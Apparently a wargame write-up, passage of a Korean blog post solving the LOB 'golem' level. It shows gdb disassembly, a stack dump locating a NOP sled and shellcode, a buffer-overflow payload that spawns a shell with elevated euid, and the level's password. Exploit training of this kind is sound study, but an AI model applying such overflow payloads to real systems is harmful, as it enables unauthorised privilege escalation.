0x80484f6 <main+134>: lea 0xffffffd8(%ebp),%eax
0x80484f9 <main+137>: mov $0xbfffffcf,%edx
0x80484fe <main+142>: mov %edx,%ecx
0x8048500 <main+144>: sub %eax,%ecx
0x8048502 <main+146>: mov %ecx,%eax
0x8048504 <main+148>: push %eax
0x8048505 <main+149>: push $0x0
0x8048507 <main+151>: lea 0xffffffd8(%ebp),%eax
0x804850a <main+154>: lea 0x30(%eax),%edx
0x804850d <main+157>: push %edx
0x804850e <main+158>: call 0x8048398 <memset>
0x8048513 <main+163>: add $0xc,%esp
0x8048516 <main+166>: leave
0x8048517 <main+167>: ret
0x8048518 <main+168>: nop
0x8048519 <main+169>: nop
0x804851a <main+170>: nop
0x804851b <main+171>: nop
0x804851c <main+172>: nop
0x804851d <main+173>: nop
0x804851e <main+174>: nop
0x804851f <main+175>: nop
End of assembler dump.
(gdb)
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r `perl -e 'print Quit
(gdb) Quit
(gdb) Quit
(gdb) r `perl -e 'print "\xbf"x48'`
Starting program: /home/skeleton/tmp/./golem `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Breakpoint 1, 0x8048517 in main ()
(gdb) x/1000x 0xbfff000
0xbfff000: Cannot access memory at address 0xbfff000
(gdb) x/1000x 0xbfffff0
0xbfffff0: Cannot access memory at address 0xbfffff0
(gdb) x/1000x 0xbffff000
0xbffff000: 0x00000583 0x000006de 0x00000432 0x0000013f
0xbffff010: 0x0000016e 0x000002f1 0x00000000 0x00000420
0xbffff020: 0x000006c0 0x0000052e 0x0000046c 0x00000000
0xbffff030: 0x000004cd 0x00000660 0x00000000 0x000001af
0xbffff040: 0x0000048a 0x4002bb0e 0xbffff118 0x400081e6
0xbffff050: 0x4002bad5 0x4002bad5 0x40013868 0x40014930
0xbffff060: 0x0000598c 0x00000259 0x00000000 0x00000591
0xbffff070: 0x000006ea 0x000006ec 0x0000028f 0x000005bb
0xbffff080: 0x000006ce 0x00005450 0x000003c7 0x000006c2
0xbffff090: 0x00000000 0x0000070b 0x400221c0 0x00000545
0xbffff0a0: 0x40023fd0 0x4001cd70 0x40014930 0x00000004
0xbffff0b0: 0x40014ba0 0x00000002 0xbffff0d0 0x400221c0
0xbffff0c0: 0x40014b34 0x03c40f19 0xbffff14c 0x4002995c
0xbffff0d0: 0x400221c0 0x40014930 0x4002bad5 0x4002bad5
0xbffff0e0: 0x40013868 0x40014930 0x0000590a 0x0000065b
0xbffff0f0: 0x00000561 0x000005cc 0x00000000 0x40001402
0xbffff100: 0xbffff1d0 0x40008134 0x40000c7d 0x40024f23
0xbffff110: 0x40013868 0x40014930 0x00000f53 0x4000a7fd
0xbffff120: 0x40014920 0x40014c58 0x00000007 0x4000a74e
0xbffff130: 0x4010a1ec 0xbffff1d1 0x00000000 0x00000180
0xbffff140: 0x400221c0 0x4010a710 0x00000000 0x400221c0
0xbffff150: 0x40000474 0x00000000 0x40000824 0x400002f4
0xbffff160: 0x40013c00 0x00000004 0x40014ba0 0x00000004
0xbffff170: 0xbffff188 0x4001dd60 0x40014b3c 0x056e90c5
0xbffff180: 0xbffff204 0x40024f23 0x4001dd60 0x40014930
0xbffff190: 0x000000bd 0x4002bb0e 0xbffff268 0x400081e6
0xbffff1a0: 0x4002bad5 0x4002bad5 0x40013868 0x40014930
0xbffff1b0: 0x0000187f 0x00000001 0x4001fe70 0x00000310
0xbffff1c0: 0x40023fd0 0x4001cd70 0x40014930 0x00000004
0xbffff1d0: 0xbffff208 0x4000a7fd 0x40014920 0x40014c58
0xbffff1e0: 0x40001402 0xbffff2b4 0x40008134 0x40000ec9
0xbffff1f0: 0x40025713 0x40013868 0x40014930 0x00001743
0xbffff200: 0x40024f23 0x4001dd60 0xbffff248 0x4000a970
0xbffff210: 0x40017000 0x40108980 0x400c0b00 0x00000000
0xbffff220: 0x40000ec9 0x400707e4 0x00000001 0x00000000
0xbffff230: 0x00000031 0x40000664 0x00000000 0x40000824
0xbffff240: 0x400002f4 0x40013c00 0x00000004 0x40014ba0
0xbffff250: 0x00000004 0xbffff26c 0x4001e4f0 0x40014b3c
0xbffff260: 0x00dc28f5 0xbffff2e8 0x40025713 0x4001e4f0
0xbffff270: 0x40014930 0x40108980 0x40017000 0x00000031
0xbffff280: 0x4010a1ec 0x40108980 0xbffff2a8 0x4006fa3e
---Type <return> to continue, or q <return> to quit---
0xbffff290: 0x40108980 0x40017000 0x00000031 0x4010a1ec
0xbffff2a0: 0x00000001 0x40108980 0xbffff2bc 0x400711c7
0xbffff2b0: 0x40108980 0xbffff2ec 0x4000a7fd 0x40014920
0xbffff2c0: 0x40014c58 0x00000007 0x4000a74e 0x4010a1ec
0xbffff2d0: 0x0804859c 0x00000001 0x40014930 0x4001e4f0
0xbffff2e0: 0x4010a320 0x40025713 0x4001e4f0 0xbffff9a4
0xbffff2f0: 0x4000a970 0x40108980 0x00000400 0x4006c2e4
0xbffff300: 0x40014930 0xbffff9a4 0x4006428b 0x40108980
0xbffff310: 0x4010a1ec 0x4000ae60 0xbffffa44 0x00000000
0xbffff320: 0x0000675b 0x000081a4 0x00000001 0x00000000
0xbffff330: 0x00000000 0x00000808 0x00000000 0x00000000
0xbffff340: 0x00008561 0x000081ed 0x00000001 0x00000000
0xbffff350: 0x40001402 0xbffff424 0x400081e6 0x400013e1
0xbffff360: 0x400013e1 0x40013868 0x400013a5 0x40000824
0xbffff370: 0x400013d3 0x40013c00 0x40014b90 0x0000000e
0xbffff380: 0x40013e80 0x0804859c 0x250014c4 0x00000000
0xbffff390: 0x00000001 0x4002bad5 0x40001353 0x00000000
0xbffff3a0: 0xbffff428 0x40000814 0x00000052 0x40000824
0xbffff3b0: 0x400002f4 0x40013c00 0x00000004 0x40014ba0
0xbffff3c0: 0x00000003 0xbffff3dc 0x40000814 0x400140d4
0xbffff3d0: 0x0b725f23 0xbffff4b8 0x400013a5 0x40000814
0xbffff3e0: 0x40013c00 0x400002f4 0x40013c00 0x00000000
0xbffff3f0: 0x00000000 0x00000004 0x40014ba0 0x00000004
0xbffff400: 0xbffff420 0x40000674 0x400140d8 0x01ee5739
0xbffff410: 0xbffff4b8 0x40000edc 0x40013868 0x40013c00
0xbffff420: 0x00000000 0xbffff4e8 0x4000966a 0x080480f4
0xbffff430: 0x40014cf8 0x00000007 0x40013868 0x00000000
0xbffff440: 0x40013e70 0x40000814 0x40009c50 0x00005207
0xbffff450: 0x4001a0dc 0x4001a0dc 0x4001a0e8 0x00000018
0xbffff460: 0x400017f4 0x00000004 0x4001a0e8 0x40013c00
0xbffff470: 0xbffff4d0 0x2073f4cc 0xffffffff 0xffffffd0
0xbffff480: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff490: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff4a0: 0xbffff9d0 0x00000002 0x40023fd0 0x40013c00
0xbffff4b0: 0x4000ba15 0x00000000 0x00000000 0x00000001
0xbffff4c0: 0xbffff9c8 0xbffff9a3 0x0804859b 0x08048599
0xbffff4d0: 0x00000031 0xffffffff 0x00000000 0x00000001
0xbffff4e0: 0x40000824 0xbffff4f0 0x400075bb 0x40017000
0xbffff4f0: 0x00002fb2 0x40013868 0xbffff734 0x4000380e
0xbffff500: 0x400144d8 0x6d6f682f 0x6b732f65 0x74656c65
0xbffff510: 0x742f6e6f 0x902f706d 0x90909090 0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffff520: 0x90909090 0x0804859c 0x90909090 0x90909090
0xbffff530: 0x90909090 0x90909090 0x00000000 0x00000000
0xbffff540: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff550: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff560: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff570: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff580: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff590: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5a0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5d0: 0x90909090 0x90909090 0x90909090 0x68909090
0xbffff5e0: 0x81cee28a 0x530cb168 0x6f6a6854 0x0168e48a
0xbffff5f0: 0x68633069 0x69743069 0xfe59146a 0x79490c0c
0xbffff600: 0xe1f741fa 0x732ec354 0x4000006f 0x40013868
0xbffff610: 0x4000220c 0xbffffb3c 0x00000000 0x00000000
0xbffff620: 0x00000000 0x00000000 0x40014b00 0x00000000
0xbffff630: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff640: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff650: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff660: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff670: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff680: 0xbffff500 0x00060000 0x00000000 0x00000000
0xbffff690: 0x00000000 0x00000001 0x00000000 0x00000000
0xbffff6a0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff700: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff710: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff720: 0x00000000 0x00000000 0x4000f7cb 0x4000f7cb
0xbffff730: 0x40013868 0xbffff778 0x4000c84c 0x08048034
0xbffff740: 0x00000006 0xbffff774 0x40013868 0xbffff9a8
0xbffff750: 0x40013da0 0x0001fbf1 0xbffffa50 0x000001fe
0xbffff760: 0x000001fe 0x000001fe 0x000001fe 0x00000006
0xbffff770: 0x08048034 0x080483c0 0xbffff79c 0x40002179
0xbffff780: 0xbffffa40 0x4000220c 0x080483c0 0x40013868
0xbffff790: 0x00000000 0xbffff7f8 0xbffff788 0xbffffa34
0xbffff7a0: 0x400020ea 0xbffffa40 0xbffff808 0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\xbf"x44,"\x70\xf5\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿poy¿
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ my-pass
euid = 511
cup of coffee
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| darkknight -> bugbear (0) | 2014.02.20 |
|---|---|
| golem -> darkknight (0) | 2014.02.20 |
| vampire -> skeleton (0) | 2014.02.20 |
| troll -> vampire (0) | 2014.02.20 |
| orge -> troll (0) | 2014.02.20 |
